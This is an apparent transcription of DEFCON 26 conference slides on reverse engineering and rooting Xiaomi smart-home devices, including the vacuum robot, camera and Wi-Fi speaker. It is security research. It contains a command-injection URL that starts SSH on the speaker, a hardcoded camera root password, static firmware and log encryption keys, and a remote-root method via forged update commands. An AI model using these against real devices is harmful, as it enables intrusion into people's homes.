Transcription
Having fun with IoT:Reverse Engineering and Hacking of Xiaomi IoT DevicesDEFCON 26 – Dennis Giese
Outline MotivationXiaomi CloudOverview of devicesReverse Engineering of devicesModification of devicesDEFCON 26 – Dennis Giese2
About me Researcher at Northeastern University, USA– Working with Prof. Guevara Noubir@CCIS Grad student at TU Darmstadt, Germany– Working with Prof. Matthias Hollick@SEEMOO Interests: Reverse engineering of interesting devices– IoT, Smart Locks– Physical Locks ;) [Insert more uninteresting information here]DEFCON 26 – Dennis Giese3
MOTIVATIONDEFCON 26 – Dennis Giese4
Why reverse IoT? (Find and exploit bugs to hack other people) De-attach devices from the vendor Enhance functionality– Add new features– Localization (e.g. Sound files)– Defeat Geo blocking Supporting other researchersDEFCON 26 – Dennis Giese5
https://moniotrlab.ccis.neu.edu/Mon(IoT)or Lab@NEUDEFCON 26 – Dennis Giese6
“Responsible disclosure”? Ethical question: “Responsible disclosure”?– Conflict: Rootability vs. Device security “Service for the Community” vs. Bug Bounty Program– Before DEFCON: contacted Xiaomi security teamDEFCON 26 – Dennis Giese7
May 2017Mi Band 2Vacuum Robot Gen 1DEFCON 26 – Dennis GieseJune 2017Lumi Smart Home Gateway SensorsResearch in cooperation with Daniel WegemerHow we startedJuly 2017Yeelink Lightbulbs (Color White)Yeelink LED Strip8
How we continuedYeelink Desk lampPhilips Eyecare Desk lampXiaomi Wi-Fi routerDEFCON 26 – Dennis GieseYeelink/Philips Ceiling LightsPhilips Smart LED BulbVacuum Robot Gen 2Yeelink Bedside LampXiaomi (Ninebot) M365Lumi Aqara CameraYeelink Smart LED Bulb (v2)Smart Power strip9
Why Vacuum Robots?Source: Xiaomi advertismentDEFCON 26 – Dennis Giese10
THE XIAOMI CLOUDDEFCON 26 – Dennis Giese11
They claim to have the biggest IoT ecosystem worldwide– 85 Million Devices, 800 different models 1 Different Vendors, one ecosystem– Same communication protocol– Different technologies supported– Implementation differs from manufacturer to manufacturer Software quality very different1:https://www.espressif.com/en/media -plans-iot-developmentDEFCON 26 – Dennis Giesehttps://github.com/MiEcosystem/miio openhttps://iot.mi.com/index.htmlXiaomi Cloud12
Xiaomi ON 26 – Dennis Giese* There could be more connections (e.g. P2P, FDS)13
Device to Cloud Communication DeviceID– Unique per device Keys– Cloud key (16 byte alpha-numeric) Is used for cloud communication (AES encryption) Static, is not changed by update or provisioning– Token (16 byte alpha-numeric) Is used for app communication (AES encryption) Dynamic, is generated at provisioning (connecting to new Wi-Fi)DEFCON 26 – Dennis Giese14
Cloud protocol Data– JSON-formatted messages Example of “Device registration”– {'id': 136163637, 'params': {'ap': {'ssid’: ‘myWifi', 'bssid':'F8:1A:67:CC:BB:AA', 'rssi': -30}, 'hw ver': 'Linux', 'life': 82614,'model': 'rockrobo.vacuum.v1', 'netif': {'localIp':'192.168.1.205', 'gw': '192.168.1.1', 'mask': '255.255.255.0'},'fw ver': '3.3.9 003077', 'mac': '34:CE:00:AA:BB:DD', 'token':'xxx'}, 'partner id': '', 'method': ' otc.info'}DEFCON 26 – Dennis Giese15
Protocol for Firmware updates APP Updates– {"method":"miIO.ota","params":{"app url":"http://cdn.cnbj0.fds.api.mi-img.com/miio fw/upd lumi.gateway.v3.bin?.","file md5":"063df95bd5 .cf11e","install":"1","proc":"dnld install","mode":"normal"},"id":123} MCU/WiFi Updates– {"method":"miIO.ota","params":{"mcu url":"http://cdn.cnbj0.fds.api.mi-img.com/miio fw/mcu lumi.gateway.v3.bin? .","install":"1","proc":"dnld install","mode":"normal"},"id":123}No Integrity provided Subdevice Updates– {"crc32":"9460d9f0","image type":"0101","manu code":"115F","md5":"e9d62 ot-ota/LM15 SP mi V1.3.22 . OTA v22 withCRC.ota"}DEFCON 26 – Dennis Giese16
Xiaomi EcosystemHTTPSWiFiXiaomiCloudZigBeeGatewayDEFCON 26 – Dennis Giese17
App to Cloud communication Authentication via OAuth Layered encryption– Outside: HTTPS– Inside: AES using a session key Message format: JSON RPC Device specific functions: provided by PluginsDEFCON 26 – Dennis Giese18
App to Cloud communication REQ: api.io.mi.com/home/device list method:POST params:[] 1234","token":“abc zzz","name":"Mi sc":"Power plug on ","rssi":-47}DEFCON 26 – Dennis Giese19
App to Cloud communication ��Source: OpenstreetmapsDEFCON 26 – Dennis Giese20
Example of Communication relationscompass uart ldsuart mcu -soundpackages, firmwaremaps,logs- *.fds.api.xiaomi.com roxydevice.conf:DID, KeyMiio client(local):54322 (tcp)0.0.0.0:54321 (udp)Robot internDEFCON 26 – Dennis Gieseott.io.mi.com:80(tcp)ot.io.mi.com:8053(udp) -commands,reports- AES encryptedAndroid/iPhone AppIPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)21
How to gain IndependenceXiaomi CloudCopyright: 20th Century FoxDEFCON 26 – Dennis Giese22
Proxy cloud communicationcompass uart ldsuart mcu*.fds.api.xiaomi.com ollerAppProxyMiio client(local):54322 (tcp)0.0.0.0:54321 (udp)Robot intern/etc/hosts130.83.x.x ot.io.mi.com130.83.x.x ott.io.mi.comDEFCON 26 – Dennis Gieseot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp) -commands,reports- Android/iPhone AppIPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)23
Proxy or endpoint server for devices– Acts as Xiaomi Cloud emulation– Reads traffic in plaintext– May send commands to the device Change or suppress commands (e.g. Updates) Requirements: Device ID, Cloud Key, DNS RedirectionDEFCON 26 – Dennis thub.com/dgiese/dustcloud-documentationWhat is Dustcloud?24
LETS TAKE A LOOK AT THEPRODUCTSDEFCON 26 – Dennis Giese25
Products 260 different models supported (WiFi Zigbee BLE)Depending on selected server location– Mainland China– Taiwanothers38%– US– – models not always compatibleMy inventory: 42 different modelsiSmart– 99 devices in mi9%Chungmi6%Yeelink6%Philips (Yeelink)4%Values estimated, Mi Home 5.3.13, Mainland China ServerDEFCON 26 – Dennis Giese26
ProductsDifferent architectures ARM Cortex-A ARM Cortex-M– Marvell 88MW30X (integrated WiFi)– Mediatek MT7687N (integrated WiFi BLE) MIPS Xtensa– ESP8266, ESP32 (integrated WiFi)DEFCON 26 – Dennis GieseFocus of this talkFocus of my binary patchingtalk @IoT Village today“Why I hate ESP8266”@IoT Village today27
Operation Systems „Full Linux“ e.g. Ubuntu 14.04– Vacuum cleaning robotsOpenWRT– Xiaomi Wifi Speaker, Routers, Minij washing machineEmbedded Linux– IP camerasRTOS– Lightbulbs, ceiling lights, light stripsDEFCON 26 – Dennis Giese28
ImplementationsVacuum RobotSmart Home Gateway* Philips Ceiling LightYeelink Bedside LampManufacturerRockroboLumi UnitedMCUAllwinner STM TI Marvell (Wi-Fi)Firmware Update Encrypted HTTPS Not Encrypted(No SSL stack!)Chinese device,Debug Interfaces ProtectedAvailable Bonus:but unknownYeelightMediaTek (Wi-Fi BLE)Not Encrypted HTTPS(No Cert check!)Availablecommunication toServer in Salt Lake City,USA (166.70.53.160)*Does not apply for DGNWG03LM (Gateway model for Taiwan)DEFCON 26 – Dennis Giese29
Good news Vendors/Developers are lazy Assumed development of firmware:– Take SDK/toolchain– Modify sample that the product runs– If it works: publish firmwareAll firmwares very similar (memory layout,functions, strings, etc)DEFCON 26 – Dennis Giese30
LETS GET ACCESS TO THE DEVICESDEFCON 26 – Dennis Giese31
Warranty seal?DEFCON 26 – Dennis Giese32
Applies to: lumi.camera.aq1AQARA SMART IP CAMERADEFCON 26 – Dennis Giese33
Overview Hardware CPU: Hi3518EV200– ARM Cortex-A RAM: 64MB Flash: 16MByte Wi-Fi: Mediatek MT7601UN via USB OS: Embedded Linux Zigbee-MCU: NXP JN5169DEFCON 26 – Dennis Giese34
Devices connected via ZigbeeZigbee (NXP JN5169) based Motion Sensor Temperature sensors Power Plug Smoke Detectors Smart Door Lock DEFCON 26 – Dennis Giese35
Serial port after bricking deviceDEFCON 26 – Dennis Giese36
Leaked information JFFS2 filesystem not properly cleaned 3 different credentials from development devices 58326c20613d3b69237565643d6e45756c6d41DEFCON 26 – Dennis 70aXX306f6d025f00636e20230a6bXX3772612e6900 .;.,# cat /etc /miio/device.con f.# did must be a unsigned int.# key)p.Nstring. #.did 5060365X.k ey NA7NimKoXXXXX iXn.mac 28:6C:07 :2E:XX:XX.vendor lumi.# model ma x len 23. camera.aq1.p2p i d A,.0111A.37
Rooting Serial was not necessary– open telnet server (port 23)– hardcoded root password in /etc/shadow “root:IIfCcCAiKWPNs:17333:0:99999:7::” DES-Crypt - password truncated to 8 chars Password: “lumi-201”– Same credentials for all camerasDEFCON 26 – Dennis Giese38
Modifications Replace Chinese sound filesReplace telnetd by dropbear (SSH)Change root passwordReplace Camera SoftwareDEFCON 26 – Dennis Giese39
DEFCON 26 – Dennis GieseApplies to: xiaomi.wifispeaker.v1, basic idea also for xiaomi.router.*WI-FI NETWORK SPEAKER40
Overview Hardware CPU: Amlogic Meson3– ARM Cortex-A RAM: 128MB Flash: 8GByte WI-Fi BT: Broadcom BCM4345 OS: OpenWRT– Samba 3.x Released: End 2016DEFCON 26 – Dennis Giese41
Serial PortDEFCON 26 – Dennis Giese42
Teardown of device not necessary Classic vulnerability: no input validationhttp://{ip}:9999/{ssdp id}/Upnp/resource/sys?command nslookup&host echo192.168.0.2 &dns server /etc/init.d/ssh start Update (08.08.2018): Xiaomiclaims this was fixed in aninternal release in April 2018DEFCON 26 – Dennis Giese43Research in cooperation with “teprrr”Rooting
Firmware updates Query Update Information over HTTP– http://soundbar.pandora.xiaomi.com/XXXXXXX/XXXXXX Firmware updates over HTTP– packed LZMA in XML format– EXT2 images– No signaturesDEFCON 26 – Dennis Giese44
DEFCON 26 – Dennis Giese45Research in cooperation with Daniel Wegemerrockrobo.vacuum.v1 (End of 2016), roborock.vacuum.s5 (End of 2017)VACUUM CLEANING ROBOTS
Gen 1 Device OverviewSource: Xiaomi advertismentDEFCON 26 – Dennis Giese46
TeardownDEFCON 26 – Dennis Giese47
Frontside layout mainboard512 MB RAMSTM32 MCUR16SOC4GBeMMCFlashWiFi ModuleDEFCON 26 – Dennis Giese48
Backside layout mainboardLIDAR UARTR16 UART(115200 baud)STM UART(921600 baud)TxRxTxDEFCON 26 – Dennis Giese49
Frontside layout mainboard (Gen2)R16SOCWiFi ModuleDEFCON 26 – Dennis Giese512 MBRAMSTM32MCU4GBeMMCFlash50
Rooting Usual (possibly destructive) way to retrieve the firmwareDEFCON 26 – Dennis Giese51
RootingOur weapon of choice:DEFCON 26 – Dennis Giese52
Pin Layout CPUUART012345MMC26A7MMCReset8BD7 D5 D3 D1101112D6 D4 D2 D0CRX TXD9MMC11314151617D2 D0 CLKTXD3 D1 CMDRXCLKSDACMDSCLUART1TWI1ERecov ConfirerymFUART2RX TXGNLineIN LLINEIN RPHONE INPHONE INPHONEPHONEMIC1PMIC2PPSDA SCKRESETUSBDM0USBDM1USBDP0USBDP1HJKLMRSB0RTLCD9 LCD7 LCD5 LCD3 LCD1UUSBLCD8 LCD6 LCD4 LCD2 LCD0 DRVDRAMDEFCON 26 – Dennis GieseVCC/VDD GNDUSB 1USB 2LCD53
Rooting (Gen1 Gen2) Shortcut the MMC data lines SoC falls back to FEL mode Load Execute tool in RAM––––Via USB connectorDump MMC flashModify imageRewrite image to flashDEFCON 26 – Dennis Giese54
Software Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)– Mostly untouched, patched on a regular basePlayer 3.10-svn– Open-Source Cross-platform robot device interface & serverProprietary software (/opt/rockrobo)– Custom adbd-versioniptables firewall enabled (IPv4!)– Blocks Port 22 (SSHd) Port 6665 (player)– Fail: IPv6 not blocked at allDEFCON 26 – Dennis Giese55
Available data on device Data– Logfiles (syslogs, stats, Wi-Fi credentials)– Maps Data is uploaded to cloud Factory reset– Does not delete data: Maps, Logs still existDEFCON 26 – Dennis Giese 100 Gbytewrites per Year56
Available data on device Maps– Created by player– 1024px * 1024px– 1px 5cmDEFCON 26 – Dennis Giese57
eMMC LayoutLabelContentSize in MByteboot-resbitmaps & some wav files8envuboot cmd line16appdevice.conf (DID, key, MAC), adb.conf, vinda16recoveryfallback copy of OS512system acopy of OS (active by default)512system bcopy of OS (passive by default)512Downloadtemporary unpacked OS update528reserveconfig calibration files, blackbox.db16UDISK/Datalogs, maps, pcap files 1900DEFCON 26 – Dennis Giese58
Update processsystem aActivecopyddsystem bmiIO.ota {"mode":"normal“, "install":"1",Updateroot pw"app url":"https://[URL]/v11 [version].pkg",Downloadin /etc/shadow"file ck ddDecrypt image MD5OK? ok?rebooting 2. Download [app url]DEFCON 26 – Dennis Giese59
Firmware updates Integrity– MD5 provided by cloud Full images– Encrypted tar.gz archives– Contains disk.img with 512 Mbyte ext4-filesystem Encryption– Ccrypt [256-bit Rijndael encryption (AES)]– Static password: “rockrobo”Sound PackagesStatic password: “r0ckrobo#23456”DEFCON 26 – Dennis Giese60
DEFCON 26 – Dennis Giese61
Lets root remotely Preparation: Rebuild Firmware– Include authorized keys– Remove iptables rule for sshd Send „miIO.ota“ command to vacuum– Encrypted with token From app or unprovisioned state– Pointing to own http serverDEFCON 26 – Dennis Giese62
Lets root remotely„Get Token“„miIO.ota“unprovisioned stateWebserverDEFCON 26 – Dennis Giese63
SSHDEFCON 26 – Dennis Giese64
DEFCON 26 – Dennis Giese65
DEFCON 26 – Dennis Giese66
Possible Countermeasures Changing the firmware key– Useless - we will figure out ;) Encrypting/Obfuscating the log-files and maps– Recently introduced– Here is the AES128CBC-key: “RoCKR0B0@BEIJING”DEFCON 26 – Dennis GieseCopyright: 20th Century Fox67
How to get the log and map AES key? RRlogd uses AES encryption functions from OpenSSL library– Imported as dynamic library– Interesting function: EVP EncryptInit ex(.) Helpful tool: ltrace– Intercepts library calls– Shows contents arguments of function callsDEFCON 26 – Dennis Giese68
Persistance Patch the recovery partition– Replace custom adbd with open source one– disable firewall Disable updates– Kill SysUpdate process– Disable Ccrypt Extract credentials– Content of “vinda.conf” root password (XOR 0x37)– DID, cloud keyDEFCON 26 – Dennis Giese69
Research in cooperation with Jan RugeSide note about Entropy Recap: Token is AES256 key– Method used for Generation: Initialization: srand(seed)– seed has 231 states 16 times rand()DEFCON 26 – Dennis Giese70
Rooting– Remote! (No „foil attack“ required anymore) Cloud Connection– Run without cloud Support by third-party tools (e.g. FloleVac, FHEM, etc)– Run with your own cloudDEFCON 26 – Dennis Giese71https://xiaomi.flole.de/Summary of the Vacuum
HAVING FUN IN HACKINGDEFCON 26 – Dennis Giese72
https://arxiv.org/pdf/1501.03378.pdfConnection to the Dark Side Idea by Prof. Noubir: Let’s run Tor hidden services on IoT– Paper from 2015: OnionBots, a stealthy botnet withcompromised IoT devices Easy to install in Ubuntu– Make SSH accessible via TOR– No need for NAT ;)DEFCON 26 – Dennis Giese73
Using empty spaceDEFCON 26 – Dennis Giese74
Using empty space Zigbee module fits in vacuum– Use serial connection– ARM binaries of Gateway run natively– Result: Zombie-Gateway-Vacuum USB stick– More space: mobile Data storage– Soldered to MicroUSB portDEFCON 26 – Dennis Giese75
Mobile Wi-Fi mapper Idea:– Parsing of position2d from player logfile{x pos, y pos, yaw pos, x vel, y vel, yaw vel}– Retrieving WiFi information from Linux kernel{link, level, noice, SSID, BSSID) Developed with Andrew Tu @HackBeanpot 2018, BostonDEFCON 26 – Dennis Giese76
Mobile Wi-Fi mapperGenuine Jack Morton Office, NE Side,5th floorDEFCON 26 – Dennis Giese77
Mobile Wi-Fi mapperDEFCON 26 – Dennis Giese78
If in need of additional space Done by Dustcloud user Reason: broken MMC-Chip Not recommended for everyone ;)DEFCON 26 – Dennis Giese79
If in need of additional spaceDEFCON 26 – Dennis Giese80
IoT chatting with IoTDEFCON 26 – Dennis Giese81
One word of warning Never leave your devices unprovisioned– Someone else can provision it for you Install malicious firmware Be careful with used devices– e.g. Amazon Marketplace, Ebay, etc.– Some malicious software may be installed Never install rooted firmware from untrusted sources !!!!– Expecially not from russian forums!DEFCON 26 – Dennis Giese82
Conclusion Basic best practices not used– firmware signatures – HTTPS, certificate verification – Hardware security features Good– We can modify the devices Bad– Someone else can do tooDEFCON 26 – Dennis Giese83
Daniel Wegemer (aka DanielAW)Prof. Guevara Noubir (CCIS, Northeastern University) Secure Mobile Networking (SEEMOO) Labs and CROSSING S1 Andrew Sellars and Team (Boston University Technology & Cyberlaw Clinic)DEFCON 26 – Dennis bu.edu/tclc/Acknowledgements84
Questions?Meet me at the IoT Village here at DefconContact:See: http://dontvacuum.meTelegram: https://t.me/kuchenmonsterTwitter: dgi DEDEFCON– Dennis GieseMeetme in26Boston/@DC61785
DEFCON 26 – Dennis Giese86
Reverse Engineering and Hacking of Xiaomi IoT Devices DEFCON 26 -Dennis Giese. DEFCON 26 -Dennis Giese 2 Outline Motivation Xiaomi Cloud Overview of devices Reverse Engineering of devices Modification of devices. DEFCON 26 -Dennis Giese 3 About me Researcher at Northeastern University, USA
